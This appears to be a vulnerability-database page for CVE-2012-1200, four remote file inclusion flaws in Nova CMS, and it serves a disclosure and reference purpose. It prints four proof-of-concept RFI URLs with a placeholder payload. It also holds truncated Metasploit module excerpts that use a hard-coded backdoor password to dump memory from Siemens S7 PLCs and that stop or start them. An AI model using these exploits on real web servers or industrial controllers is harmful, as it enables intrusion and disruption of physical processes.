CVE-2012-1200
Published 2012-02-18
Priority P349 · high · 7.5 CVSS 2.0
AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 2.75% (84.4th percentile)
Multiple PHP remote file inclusion vulnerabilities in Nova CMS allow remote attackers to execute arbitrary PHP code via a URL in the (1) fileType parameter to optimizer/index.php, (2) id parameter to administrator/modules/moduleslist.php, (3) filename parameter to includes/function/gets.php, or (4) conf[blockfile] parameter to includes/function/usertpl.php.
No detection rules found.
Exploit-DB
Siemens Simatic S7-300 - PLC Remote Memory Viewer (Metasploit)
exploitdb·2012-07-14
---
# Exploit Title: Siemens Simatic S7 300 Remote Memory Viewer Backdoor
# Date: 7-13-2012
# Exploit Author: Dillon Beresford
# Vendor Homepage: http://www.siemens.com/
# Tested on: Siemens Simatic S7-1200 PLC
# CVE : None
require 'msf/core'
class Metasploit3 'Siemens Simatic S7-300 PLC Remote Memory Viewer',
'Description' => %q{ This module attempts to authenticate using a hard-coded backdoor password in
the Simatic S7-300 PLC and dumps the device memory using system commands.
Mode: Values 8, 16 or 32 bit access
Valid address areas are:
80000000 - 81FFFFFF SD-Ram cached
A0000000 - A1FFFFFF SD-Ram uncached
A8000000 - A87FFFFF Norflash
AFC00000 - AFC7FFFF ED-Ram int. uncached
BFE00000 - BFEFFFFD COM-ED-Ram ext.
C0000000 - C
Exploit-DB
Siemens Simatic S7-1200 - CPU START/STOP Module (Metasploit)
exploitdb·2012-07-14
---
# Exploit Title: Siemens Simatic S7 1200 CPU command module
# Date: 7-13-2012
# Exploit Author: Dillon Beresford
# Vendor Homepage: http://www.siemens.com/
# Tested on: Siemens Simatic S7-1200 PLC
# CVE : None
require 'msf/core'
class Metasploit3 'Siemens Simatic S7-1200 CPU START/STOP Module',
'Description' => %q{
The Siemens Simatic S7-1200 S7 CPU start and stop functions over ISO-TSAP
this modules allows an attacker to perform administrative commands without authentication.
This module allows a remote user to change the state of the PLC between
STOP and START, allowing an attacker to end process control by the PLC.
},
'Author' => 'Dillon Beresford',
'License' => MSF_LICENSE,
'References' =>
[
[ 'URL', 'http://www.us-ce
Exploit-DB
Nova CMS - '/includes/function/gets.php?Filename' Remote File Inclusion
exploitdb·2012-02-11
CVE-2012-1200 Nova CMS - '/includes/function/gets.php?Filename' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/51976/info
Nova CMS is prone to multiple remote file-include vulnerabilities because the application fails to sufficiently sanitize user-supplied input.
Exploiting these issues may allow a remote attacker to obtain sensitive information or execute malicious PHP code in the context of the webserver process. This may allow the attacker to compromise the application and the underlying computer; other attacks are also possible.
http://www.example.com/novacms/includes/function/gets.php?filename=[EV!L]
Exploit-DB
Nova CMS - '/optimizer/index.php?fileType' Remote File Inclusion
exploitdb·2012-02-11
CVE-2012-1200 Nova CMS - '/optimizer/index.php?fileType' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/51976/info
Nova CMS is prone to multiple remote file-include vulnerabilities because the application fails to sufficiently sanitize user-supplied input.
Exploiting these issues may allow a remote attacker to obtain sensitive information or execute malicious PHP code in the context of the webserver process. This may allow the attacker to compromise the application and the underlying computer; other attacks are also possible.
http://www.example.com/novacms/optimizer/index.php?fileType=[EV!L]
Exploit-DB
Nova CMS - '/includes/function/usertpl.php?conf[blockfile]' Remote File Inclusion
exploitdb·2012-02-11
CVE-2012-1200 Nova CMS - '/includes/function/usertpl.php?conf[blockfile]' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/51976/info
Nova CMS is prone to multiple remote file-include vulnerabilities because the application fails to sufficiently sanitize user-supplied input.
Exploiting these issues may allow a remote attacker to obtain sensitive information or execute malicious PHP code in the context of the webserver process. This may allow the attacker to compromise the application and the underlying computer; other attacks are also possible.
http://www.example.com/novacms/includes/function/usertpl.php?conf[blockfile]=[EV!L]
Exploit-DB
Nova CMS - '/administrator/modules/moduleslist.php?id' Remote File Inclusion
exploitdb·2012-02-11
CVE-2012-1200 Nova CMS - '/administrator/modules/moduleslist.php?id' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/51976/info
Nova CMS is prone to multiple remote file-include vulnerabilities because the application fails to sufficiently sanitize user-supplied input.
Exploiting these issues may allow a remote attacker to obtain sensitive information or execute malicious PHP code in the context of the webserver process. This may allow the attacker to compromise the application and the underlying computer; other attacks are also possible.
http://www.example.com/novacms/administrator/modules/moduleslist.php?id=[EV!L]
No writeups or analysis indexed.
http://packetstormsecurity.org/files/109669/Nova-CMS-Remote-File-Inclusion.html
http://www.securityfocus.com/bid/51976
https://exchange.xforce.ibmcloud.com/vulnerabilities/73159
Published: 2012-02-18